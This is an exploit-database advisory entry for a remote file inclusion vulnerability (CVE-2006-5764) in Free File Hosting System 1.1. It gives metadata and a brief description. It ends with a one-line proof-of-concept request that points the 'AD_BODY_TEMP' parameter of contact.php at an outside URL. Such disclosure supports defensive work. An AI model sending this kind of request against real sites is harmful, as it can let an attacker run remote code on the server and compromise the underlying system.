Free File Hosting System 1.1 - 'contact.php?AD_BODY_TEMP' Remote File Inclusion

Author: IbnuSina
type: webapps
platform: php
port: 
date_added: 2007-03-24  
date_updated: 2013-11-22  
verified: 1  
codes: CVE-2006-5764;OSVDB-33818  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 29772.txt  

source: https://www.securityfocus.com/bid/23118/info

Free File Hosting is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Version 1.1 is vulnerable to these issues.

This BID was incorrectly reporting Free File Upload script as the affected package. Free File Upload script is the demo version of the Free File Hosting script.

This issue is related to BID 20781 - Free File Hosting Forgot_Pass.PHP Remote File Include Vulnerability.

http://www.example.com/contact.php?AD_BODY_TEMP=http://www.example2.com